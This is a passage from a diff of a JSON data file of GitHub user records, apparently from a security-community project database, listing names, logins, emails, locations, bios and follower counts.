"Security Researcher || libModSecurity author || PhD", - "is_hireable": true, - "twitter_username": "zimmerle" + "following_count": 1, + "followers_count": 24, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2011-02-02T14:55:44Z", + "updated_at": "2024-03-20T17:31:56Z", + "node_id": "MDQ6VXNlcjU5Njg5MQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 940, + "pk": 6191, "fields": { - "nest_created_at": "2024-09-11T22:35:45.181Z", - "nest_updated_at": "2024-09-11T22:41:59.901Z", - "name": "Victor Hora", - "login": "victorhora", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15767386?v=4", - "company": "@NCC Group", - "location": "Canada", + "nest_created_at": "2024-09-22T07:36:34.074Z", + "nest_updated_at": "2024-09-22T18:39:05.178Z", + "name": "Chai Zhenhua", + "login": "chaizhenhua", + "email": "chaizhenhua@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3071176?v=4", + "company": "", + "location": "China", "collaborators_count": 0, - "following_count": 35, - "followers_count": 123, - "public_gists_count": 4, - "public_repositories_count": 15, - "created_at": "2015-11-10T06:27:05Z", - "updated_at": "2022-04-25T18:00:51Z", - "node_id": "MDQ6VXNlcjE1NzY3Mzg2", - "bio": "Senior Security Consultant at NCC Group and co-maintainer of the ModSecurity project.", + "following_count": 100, + "followers_count": 46, + "public_gists_count": 7, + "public_repositories_count": 30, + "created_at": "2012-12-18T10:07:30Z", + "updated_at": "2024-09-22T05:26:53Z", + "node_id": "MDQ6VXNlcjMwNzExNzY=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 941, + "pk": 6192, "fields": { - "nest_created_at": "2024-09-11T22:35:58.913Z", - "nest_updated_at": "2024-09-11T22:35:58.913Z", - "name": "Justin Gerace", - "login": "spectrumjade", + "nest_created_at": "2024-09-22T07:36:34.699Z", + "nest_updated_at": "2024-09-22T18:39:05.793Z", + "name": "Nick Galbreath", + "login": "client9", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/705937?v=4", - "company": "Meta", - "location": "Irvine, CA", + "avatar_url": "https://avatars.githubusercontent.com/u/217179?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 6, - "followers_count": 19, - "public_gists_count": 0, - "public_repositories_count": 24, - "created_at": "2011-04-02T21:17:00Z", - "updated_at": "2023-04-30T01:19:54Z", - "node_id": "MDQ6VXNlcjcwNTkzNw==", + "following_count": 3, + "followers_count": 320, + "public_gists_count": 6, + "public_repositories_count": 22, + "created_at": "2010-03-06T15:21:53Z", + "updated_at": "2024-05-18T05:21:25Z", + "node_id": "MDQ6VXNlcjIxNzE3OQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -383778,49 +640727,49 @@ }, { "model": "github.user", - "pk": 942, + "pk": 6193, "fields": { - "nest_created_at": "2024-09-11T22:36:03.585Z", - "nest_updated_at": "2024-09-16T21:14:04.522Z", - "name": "Marc Stern", - "login": "marcstern", - "email": "marc.stern@approach-cyber.com", - "avatar_url": "https://avatars.githubusercontent.com/u/5736521?v=4", - "company": "Approach Cyber", - "location": "Belgium", + "nest_created_at": "2024-09-22T07:36:35.019Z", + "nest_updated_at": "2024-09-22T19:48:49.670Z", + "name": "Greg Wroblewski", + "login": "gwroblew", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1519066?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 3, + "followers_count": 40, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2013-10-21T10:39:52Z", - "updated_at": "2024-09-04T08:25:22Z", - "node_id": "MDQ6VXNlcjU3MzY1MjE=", - "bio": "Working in Cyber Security for 20+ years, currently at Approach-Cyber. WAF, Crypto, eID, IAM, SSDLC, Confidential Computing, ...", + "public_repositories_count": 15, + "created_at": "2012-03-09T06:50:21Z", + "updated_at": "2024-09-09T18:26:51Z", + "node_id": "MDQ6VXNlcjE1MTkwNjY=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 943, + "pk": 6194, "fields": { - "nest_created_at": "2024-09-11T22:36:08.958Z", - "nest_updated_at": "2024-09-11T22:36:08.958Z", - "name": "", - "login": "tailianos", + "nest_created_at": "2024-09-22T07:36:35.359Z", + "nest_updated_at": "2024-09-22T18:39:06.428Z", + "name": "Lasse Karstensen", + "login": "lkarsten", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7323965?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/108894?v=4", "company": "", - "location": "", + "location": "Oslo, Norway", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2014-04-17T07:24:35Z", - "updated_at": "2015-11-10T08:12:43Z", - "node_id": "MDQ6VXNlcjczMjM5NjU=", + "following_count": 3, + "followers_count": 45, + "public_gists_count": 30, + "public_repositories_count": 23, + "created_at": "2009-07-26T20:18:48Z", + "updated_at": "2024-08-13T12:57:08Z", + "node_id": "MDQ6VXNlcjEwODg5NA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -383828,49 +640777,49 @@ }, { "model": "github.user", - "pk": 944, + "pk": 6195, "fields": { - "nest_created_at": "2024-09-11T22:36:15.284Z", - "nest_updated_at": "2024-09-11T22:36:15.284Z", - "name": "Stefano Angaran", - "login": "oniric85", - "email": "stefano.angaran@upyou.it", - "avatar_url": "https://avatars.githubusercontent.com/u/3330275?v=4", - "company": "@castoredc", + "nest_created_at": "2024-09-22T07:36:35.670Z", + "nest_updated_at": "2024-09-22T18:39:06.776Z", + "name": "", + "login": "asterite3", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5569241?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 7, - "public_gists_count": 1, + "following_count": 2, + "followers_count": 10, + "public_gists_count": 11, "public_repositories_count": 18, - "created_at": "2013-01-21T16:05:24Z", - "updated_at": "2024-08-19T10:47:08Z", - "node_id": "MDQ6VXNlcjMzMzAyNzU=", - "bio": "Software engineer, security addicted, geek.", - "is_hireable": true, + "created_at": "2013-09-29T11:42:59Z", + "updated_at": "2024-09-15T18:09:19Z", + "node_id": "MDQ6VXNlcjU1NjkyNDE=", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 945, + "pk": 6196, "fields": { - "nest_created_at": "2024-09-11T22:36:25.986Z", - "nest_updated_at": "2024-09-11T22:36:25.986Z", - "name": "Alex Schoenmaker", - "login": "sAnexeh", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7021925?v=4", - "company": "", - "location": "Netherlands", + "nest_created_at": "2024-09-22T07:36:35.984Z", + "nest_updated_at": "2024-09-22T18:39:07.087Z", + "name": "Brandon Payton", + "login": "brandonpayton", + "email": "brandon@happycode.net", + "avatar_url": "https://avatars.githubusercontent.com/u/530877?v=4", + "company": "@Automattic ", + "location": "Hamilton, Indiana", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2014-03-21T11:57:01Z", - "updated_at": "2023-05-15T14:05:29Z", - "node_id": "MDQ6VXNlcjcwMjE5MjU=", + "following_count": 14, + "followers_count": 96, + "public_gists_count": 16, + "public_repositories_count": 59, + "created_at": "2010-12-20T18:04:03Z", + "updated_at": "2024-07-24T12:51:32Z", + "node_id": "MDQ6VXNlcjUzMDg3Nw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -383878,24 +640827,24 @@ }, { "model": "github.user", - "pk": 946, + "pk": 6197, "fields": { - "nest_created_at": "2024-09-11T22:36:28.500Z", - "nest_updated_at": "2024-09-11T22:36:28.500Z", - "name": "Eric", - "login": "ekoome", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6114096?v=4", + "nest_created_at": "2024-09-22T07:36:36.293Z", + "nest_updated_at": "2024-09-22T19:48:25.673Z", + "name": "Robert", + "login": "p0pr0ck5", + "email": "robert@cryptobells.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4625425?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2013-12-05T12:42:47Z", - "updated_at": "2024-09-03T11:49:12Z", - "node_id": "MDQ6VXNlcjYxMTQwOTY=", + "followers_count": 167, + "public_gists_count": 42, + "public_repositories_count": 78, + "created_at": "2013-06-05T23:06:47Z", + "updated_at": "2024-09-16T16:49:05Z", + "node_id": "MDQ6VXNlcjQ2MjU0MjU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -383903,124 +640852,124 @@ }, { "model": "github.user", - "pk": 947, + "pk": 6198, "fields": { - "nest_created_at": "2024-09-11T22:36:30.907Z", - "nest_updated_at": "2024-09-11T22:36:30.907Z", - "name": "Barry Pollard", - "login": "tunetheweb", + "nest_created_at": "2024-09-22T07:36:36.627Z", + "nest_updated_at": "2024-09-22T18:39:07.732Z", + "name": "", + "login": "ziollek", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10931297?v=4", - "company": "Google", - "location": "Cork, Ireland", + "avatar_url": "https://avatars.githubusercontent.com/u/4157902?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 282, - "public_gists_count": 13, - "public_repositories_count": 66, - "created_at": "2015-02-09T22:33:19Z", - "updated_at": "2024-09-07T07:56:43Z", - "node_id": "MDQ6VXNlcjEwOTMxMjk3", - "bio": "Web Performance Developer Advocate for the Google Chrome team.\r\nAuthor of “HTTP/2 in Action” published by Manning. @tunetheweb on Twitter", + "following_count": 1, + "followers_count": 12, + "public_gists_count": 0, + "public_repositories_count": 40, + "created_at": "2013-04-15T06:53:35Z", + "updated_at": "2024-05-13T05:25:59Z", + "node_id": "MDQ6VXNlcjQxNTc5MDI=", + "bio": "", "is_hireable": false, - "twitter_username": "tunetheweb" + "twitter_username": "" } }, { "model": "github.user", - "pk": 948, + "pk": 6199, "fields": { - "nest_created_at": "2024-09-11T22:36:33.088Z", - "nest_updated_at": "2024-09-11T22:36:33.088Z", - "name": "", - "login": "TobiasGrave", + "nest_created_at": "2024-09-22T07:36:36.947Z", + "nest_updated_at": "2024-09-22T18:39:08.048Z", + "name": "David Testé", + "login": "soonum", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11976093?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/21966645?v=4", + "company": "@zama-ai", + "location": "France", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, + "following_count": 5, + "followers_count": 14, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2015-04-16T09:35:47Z", - "updated_at": "2023-08-30T11:33:43Z", - "node_id": "MDQ6VXNlcjExOTc2MDkz", - "bio": "", + "public_repositories_count": 7, + "created_at": "2016-09-03T06:14:05Z", + "updated_at": "2024-05-02T05:23:32Z", + "node_id": "MDQ6VXNlcjIxOTY2NjQ1", + "bio": "Wear shorts, they are good for your legs.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 949, + "pk": 6200, "fields": { - "nest_created_at": "2024-09-11T22:36:35.630Z", - "nest_updated_at": "2024-09-11T22:36:35.630Z", - "name": "", - "login": "npsferreira", + "nest_created_at": "2024-09-22T07:36:37.266Z", + "nest_updated_at": "2024-09-22T18:39:08.369Z", + "name": "Jianshu Wang", + "login": "wfjsw", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12939494?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2220320?v=4", + "company": "WashU DevSTAC", + "location": "Saint Louis, US", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2015-06-17T16:41:50Z", - "updated_at": "2022-04-20T16:54:25Z", - "node_id": "MDQ6VXNlcjEyOTM5NDk0", - "bio": "", - "is_hireable": false, + "following_count": 360, + "followers_count": 421, + "public_gists_count": 37, + "public_repositories_count": 150, + "created_at": "2012-08-26T03:24:39Z", + "updated_at": "2024-08-05T23:38:54Z", + "node_id": "MDQ6VXNlcjIyMjAzMjA=", + "bio": "Student / Full Stack / Cybersecurity. Looking for Summer 2025 jobs.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 950, + "pk": 6201, "fields": { - "nest_created_at": "2024-09-11T22:36:40.865Z", - "nest_updated_at": "2024-09-11T22:36:40.865Z", - "name": "upwork.link", - "login": "odesk2dot2by", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7859007?v=4", + "nest_created_at": "2024-09-22T07:36:37.893Z", + "nest_updated_at": "2024-09-22T18:39:09.090Z", + "name": "Michael Granzow", + "login": "michaelgranzow-avi", + "email": "mgranzow@vmware.com", + "avatar_url": "https://avatars.githubusercontent.com/u/29118079?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 3, "public_gists_count": 0, "public_repositories_count": 2, - "created_at": "2014-06-11T10:42:37Z", - "updated_at": "2016-02-27T16:58:04Z", - "node_id": "MDQ6VXNlcjc4NTkwMDc=", + "created_at": "2017-06-01T08:47:16Z", + "updated_at": "2024-05-27T06:52:56Z", + "node_id": "MDQ6VXNlcjI5MTE4MDc5", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 951, + "pk": 6202, "fields": { - "nest_created_at": "2024-09-11T22:36:44.637Z", - "nest_updated_at": "2024-09-11T22:36:44.637Z", - "name": "Sam Hobbs", - "login": "sam-hobbs", + "nest_created_at": "2024-09-22T07:36:38.878Z", + "nest_updated_at": "2024-09-22T19:48:36.236Z", + "name": "Elia Pinto", + "login": "devzero2000", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7817338?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/158490?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2014-06-06T16:08:10Z", - "updated_at": "2020-07-31T09:02:39Z", - "node_id": "MDQ6VXNlcjc4MTczMzg=", + "following_count": 7, + "followers_count": 25, + "public_gists_count": 9, + "public_repositories_count": 210, + "created_at": "2009-11-26T12:51:43Z", + "updated_at": "2024-02-29T18:46:39Z", + "node_id": "MDQ6VXNlcjE1ODQ5MA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -384028,49 +640977,49 @@ }, { "model": "github.user", - "pk": 952, + "pk": 6203, "fields": { - "nest_created_at": "2024-09-11T22:36:48.045Z", - "nest_updated_at": "2024-09-12T02:28:00.050Z", - "name": "Walter Hop", - "login": "lifeforms", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3464056?v=4", - "company": "@SlikNL ", - "location": "The Netherlands", + "nest_created_at": "2024-09-22T07:36:39.191Z", + "nest_updated_at": "2024-09-22T18:39:10.369Z", + "name": "Andrew Hutchings", + "login": "LinuxJedi", + "email": "andrew@mariadb.org", + "avatar_url": "https://avatars.githubusercontent.com/u/636271?v=4", + "company": "@MariaDB", + "location": "United Kingdom", "collaborators_count": 0, - "following_count": 19, - "followers_count": 66, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2013-02-03T15:38:43Z", - "updated_at": "2024-07-05T17:35:53Z", - "node_id": "MDQ6VXNlcjM0NjQwNTY=", - "bio": "Slik CTO / OWASP Core Rule Set co-lead", + "following_count": 3, + "followers_count": 162, + "public_gists_count": 3, + "public_repositories_count": 67, + "created_at": "2011-02-24T16:04:52Z", + "updated_at": "2024-09-19T13:43:23Z", + "node_id": "MDQ6VXNlcjYzNjI3MQ==", + "bio": "Chief Contributions Officer for the @MariaDB Foundation. Open Source Software advocate. Amiga upgrade designer.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "LinuxJedi" } }, { "model": "github.user", - "pk": 953, + "pk": 6204, "fields": { - "nest_created_at": "2024-09-11T22:36:50.544Z", - "nest_updated_at": "2024-09-11T22:37:26.050Z", - "name": "Chaim Sanders", - "login": "csanders-git", + "nest_created_at": "2024-09-22T07:36:39.503Z", + "nest_updated_at": "2024-09-22T18:39:10.710Z", + "name": "Hideaki Hayashi", + "login": "hideaki", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4632287?v=4", - "company": "Lyft", - "location": "Seattle, WA", + "avatar_url": "https://avatars.githubusercontent.com/u/19518?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 20, - "followers_count": 99, - "public_gists_count": 4, - "public_repositories_count": 65, - "created_at": "2013-06-06T16:17:29Z", - "updated_at": "2024-03-08T18:39:12Z", - "node_id": "MDQ6VXNlcjQ2MzIyODc=", + "following_count": 7, + "followers_count": 13, + "public_gists_count": 1, + "public_repositories_count": 11, + "created_at": "2008-08-04T17:00:42Z", + "updated_at": "2024-07-26T19:52:03Z", + "node_id": "MDQ6VXNlcjE5NTE4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -384078,24 +641027,24 @@ }, { "model": "github.user", - "pk": 954, + "pk": 6205, "fields": { - "nest_created_at": "2024-09-11T22:36:59.639Z", - "nest_updated_at": "2024-09-11T22:36:59.639Z", - "name": "Waqas Ali", - "login": "void-in", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1746697?v=4", + "nest_created_at": "2024-09-22T07:36:39.810Z", + "nest_updated_at": "2024-09-22T18:39:11.029Z", + "name": "Manish Malik", + "login": "manishmalik", + "email": "manishmalikkvs@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3881393?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 17, - "followers_count": 29, - "public_gists_count": 3, - "public_repositories_count": 26, - "created_at": "2012-05-16T18:33:06Z", - "updated_at": "2023-06-16T10:16:47Z", - "node_id": "MDQ6VXNlcjE3NDY2OTc=", + "following_count": 48, + "followers_count": 34, + "public_gists_count": 7, + "public_repositories_count": 22, + "created_at": "2013-03-16T06:54:50Z", + "updated_at": "2024-08-03T15:16:38Z", + "node_id": "MDQ6VXNlcjM4ODEzOTM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -384103,24 +641052,24 @@ }, { "model": "github.user", - "pk": 955, + "pk": 6206, "fields": { - "nest_created_at": "2024-09-11T22:37:03.808Z", - "nest_updated_at": "2024-09-11T22:37:03.808Z", - "name": "", - "login": "caracostea", + "nest_created_at": "2024-09-22T07:36:40.445Z", + "nest_updated_at": "2024-09-22T18:39:11.671Z", + "name": "Bryan Harmat", + "login": "bjh7242", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7763193?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4334716?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2014-06-01T22:40:30Z", - "updated_at": "2023-06-13T05:22:47Z", - "node_id": "MDQ6VXNlcjc3NjMxOTM=", + "following_count": 49, + "followers_count": 47, + "public_gists_count": 2, + "public_repositories_count": 35, + "created_at": "2013-05-03T20:55:27Z", + "updated_at": "2024-03-22T02:10:56Z", + "node_id": "MDQ6VXNlcjQzMzQ3MTY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -384128,24 +641077,24 @@ }, { "model": "github.user", - "pk": 956, + "pk": 6207, "fields": { - "nest_created_at": "2024-09-11T22:37:05.115Z", - "nest_updated_at": "2024-09-11T22:37:05.115Z", - "name": "", - "login": "std0ut", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12474585?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:36:40.759Z", + "nest_updated_at": "2024-09-22T19:48:51.915Z", + "name": "Nikolas Nyby", + "login": "nikolas", + "email": "nikolas@gnu.org", + "avatar_url": "https://avatars.githubusercontent.com/u/59292?v=4", + "company": "Columbia University", + "location": "New York, NY", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2015-05-16T15:50:56Z", - "updated_at": "2024-02-14T04:35:16Z", - "node_id": "MDQ6VXNlcjEyNDc0NTg1", + "following_count": 389, + "followers_count": 176, + "public_gists_count": 13, + "public_repositories_count": 477, + "created_at": "2009-03-02T08:13:36Z", + "updated_at": "2024-09-18T14:52:26Z", + "node_id": "MDQ6VXNlcjU5Mjky", "bio": "", "is_hireable": false, "twitter_username": "" @@ -384153,74 +641102,74 @@ }, { "model": "github.user", - "pk": 957, + "pk": 6208, "fields": { - "nest_created_at": "2024-09-11T22:37:13.894Z", - "nest_updated_at": "2024-09-11T22:37:13.894Z", - "name": "Katherine", - "login": "katef", - "email": "kate@elide.org", - "avatar_url": "https://avatars.githubusercontent.com/u/1371085?v=4", + "nest_created_at": "2024-09-22T07:36:41.394Z", + "nest_updated_at": "2024-09-22T19:48:37.800Z", + "name": "Rufus", + "login": "Rufus125", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5963362?v=4", "company": "", - "location": "Scotland", + "location": "", "collaborators_count": 0, - "following_count": 11, - "followers_count": 935, - "public_gists_count": 9, - "public_repositories_count": 24, - "created_at": "2012-01-23T14:51:47Z", - "updated_at": "2024-06-14T17:38:27Z", - "node_id": "MDQ6VXNlcjEzNzEwODU=", + "following_count": 32, + "followers_count": 10, + "public_gists_count": 1, + "public_repositories_count": 34, + "created_at": "2013-11-17T21:41:05Z", + "updated_at": "2024-07-10T13:57:00Z", + "node_id": "MDQ6VXNlcjU5NjMzNjI=", "bio": "", "is_hireable": false, - "twitter_username": "thingskatedid" + "twitter_username": "" } }, { "model": "github.user", - "pk": 958, + "pk": 6209, "fields": { - "nest_created_at": "2024-09-11T22:37:18.849Z", - "nest_updated_at": "2024-09-12T03:14:39.285Z", - "name": "Christian Folini", - "login": "dune73", + "nest_created_at": "2024-09-22T07:36:41.714Z", + "nest_updated_at": "2024-09-22T18:39:12.943Z", + "name": "Steven Wojcik", + "login": "stevendore", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/618722?v=4", - "company": "https://www.netnea.com", - "location": "Berne, Switzerland", + "avatar_url": "https://avatars.githubusercontent.com/u/19986241?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 86, - "public_gists_count": 10, - "public_repositories_count": 22, - "created_at": "2011-02-15T07:42:45Z", - "updated_at": "2024-07-22T04:22:45Z", - "node_id": "MDQ6VXNlcjYxODcyMg==", - "bio": "Webserver Fortification Engineer and Advisor in the Art of Defense. OWASP ModSecurity Core Rule Set Co-Lead. ", - "is_hireable": true, + "following_count": 1, + "followers_count": 5, + "public_gists_count": 3, + "public_repositories_count": 10, + "created_at": "2016-06-17T02:35:55Z", + "updated_at": "2024-07-08T19:03:33Z", + "node_id": "MDQ6VXNlcjE5OTg2MjQx", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 959, + "pk": 6210, "fields": { - "nest_created_at": "2024-09-11T22:37:20.982Z", - "nest_updated_at": "2024-09-11T22:37:20.982Z", - "name": "Meetesh Barua", - "login": "maverick64", + "nest_created_at": "2024-09-22T07:36:42.041Z", + "nest_updated_at": "2024-09-22T18:39:13.261Z", + "name": "Scott Leggett", + "login": "smlx", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6886159?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/861778?v=4", + "company": "@amazeeio", + "location": "Australia", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2014-03-07T18:33:43Z", - "updated_at": "2022-05-20T22:02:49Z", - "node_id": "MDQ6VXNlcjY4ODYxNTk=", + "following_count": 34, + "followers_count": 29, + "public_gists_count": 2, + "public_repositories_count": 33, + "created_at": "2011-06-20T13:48:35Z", + "updated_at": "2024-09-15T13:48:00Z", + "node_id": "MDQ6VXNlcjg2MTc3OA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -384228,149 +641177,149 @@ }, { "model": "github.user", - "pk": 960, + "pk": 6211, "fields": { - "nest_created_at": "2024-09-11T22:37:23.981Z", - "nest_updated_at": "2024-09-11T22:37:23.981Z", - "name": "Tom Sommer", - "login": "tomsommer", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/149171?v=4", - "company": "Simply.com", - "location": "Denmark", + "nest_created_at": "2024-09-22T07:36:42.994Z", + "nest_updated_at": "2024-09-22T18:39:14.233Z", + "name": "Mesar ali", + "login": "Mesar-Ali", + "email": "mesarali786@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/12582152?v=4", + "company": "", + "location": "India", "collaborators_count": 0, - "following_count": 0, + "following_count": 1, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 71, - "created_at": "2009-11-05T08:21:07Z", - "updated_at": "2024-06-25T17:55:53Z", - "node_id": "MDQ6VXNlcjE0OTE3MQ==", - "bio": "Creator of Simply.com, Denmarks largest webhosting provider. \r\n\r\nHorrible perfectionist.", + "public_repositories_count": 4, + "created_at": "2015-05-24T08:21:14Z", + "updated_at": "2021-12-13T11:00:55Z", + "node_id": "MDQ6VXNlcjEyNTgyMTUy", + "bio": "", "is_hireable": false, - "twitter_username": "tomsommer" + "twitter_username": "" } }, { "model": "github.user", - "pk": 961, + "pk": 6212, "fields": { - "nest_created_at": "2024-09-11T22:37:28.950Z", - "nest_updated_at": "2024-09-11T22:37:28.950Z", - "name": "Vladimir Seregin", - "login": "heaviss", + "nest_created_at": "2024-09-22T07:36:43.629Z", + "nest_updated_at": "2024-09-22T18:39:14.918Z", + "name": "", + "login": "majordaw", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9004182?v=4", - "company": "", - "location": "Novosibirsk ", - "collaborators_count": 0, - "following_count": 30, - "followers_count": 11, - "public_gists_count": 1, - "public_repositories_count": 5, - "created_at": "2014-10-03T03:10:21Z", - "updated_at": "2024-09-05T15:49:48Z", - "node_id": "MDQ6VXNlcjkwMDQxODI=", + "avatar_url": "https://avatars.githubusercontent.com/u/29426618?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2017-06-14T09:25:03Z", + "updated_at": "2021-05-10T06:14:13Z", + "node_id": "MDQ6VXNlcjI5NDI2NjE4", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 962, + "pk": 6213, "fields": { - "nest_created_at": "2024-09-11T22:37:37.699Z", - "nest_updated_at": "2024-09-11T22:37:37.699Z", - "name": "", - "login": "welljsjs", + "nest_created_at": "2024-09-22T07:36:43.943Z", + "nest_updated_at": "2024-09-22T18:39:15.226Z", + "name": "Fabrice Fontaine", + "login": "ffontaine", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/25301977?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1485263?v=4", + "company": "Orange", "location": "", "collaborators_count": 0, - "following_count": 18, - "followers_count": 7, + "following_count": 0, + "followers_count": 39, "public_gists_count": 1, - "public_repositories_count": 73, - "created_at": "2017-01-23T15:23:06Z", - "updated_at": "2024-08-25T11:33:58Z", - "node_id": "MDQ6VXNlcjI1MzAxOTc3", - "bio": "Student", - "is_hireable": true, + "public_repositories_count": 86, + "created_at": "2012-02-29T14:08:07Z", + "updated_at": "2024-05-21T06:06:22Z", + "node_id": "MDQ6VXNlcjE0ODUyNjM=", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 963, + "pk": 6214, "fields": { - "nest_created_at": "2024-09-11T22:37:39.715Z", - "nest_updated_at": "2024-09-11T22:37:39.715Z", - "name": "Marcel Tricolici", - "login": "mtricolici", + "nest_created_at": "2024-09-22T07:36:44.258Z", + "nest_updated_at": "2024-09-22T18:39:15.534Z", + "name": "Marios Levogiannis", + "login": "mlevogiannis", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/717384?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9852466?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 1, + "following_count": 5, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2011-04-08T12:16:26Z", - "updated_at": "2024-07-04T14:00:07Z", - "node_id": "MDQ6VXNlcjcxNzM4NA==", + "public_repositories_count": 2, + "created_at": "2014-11-19T22:13:25Z", + "updated_at": "2024-07-08T07:23:26Z", + "node_id": "MDQ6VXNlcjk4NTI0NjY=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "_mlevogiannis" } }, { "model": "github.user", - "pk": 964, + "pk": 6215, "fields": { - "nest_created_at": "2024-09-11T22:37:47.572Z", - "nest_updated_at": "2024-09-11T22:37:51.058Z", - "name": "Erik van Dijk", - "login": "erikvdijk", + "nest_created_at": "2024-09-22T07:36:44.584Z", + "nest_updated_at": "2024-09-22T18:39:15.844Z", + "name": "Julien Leproust", + "login": "jleproust", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/45269278?v=4", - "company": "InfoProjects", - "location": "Bussum", + "avatar_url": "https://avatars.githubusercontent.com/u/6000654?v=4", + "company": "Opendatasoft", + "location": "Nantes, France", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-11-22T16:59:15Z", - "updated_at": "2023-07-18T06:35:56Z", - "node_id": "MDQ6VXNlcjQ1MjY5Mjc4", - "bio": "", + "following_count": 5, + "followers_count": 4, + "public_gists_count": 3, + "public_repositories_count": 5, + "created_at": "2013-11-21T12:10:58Z", + "updated_at": 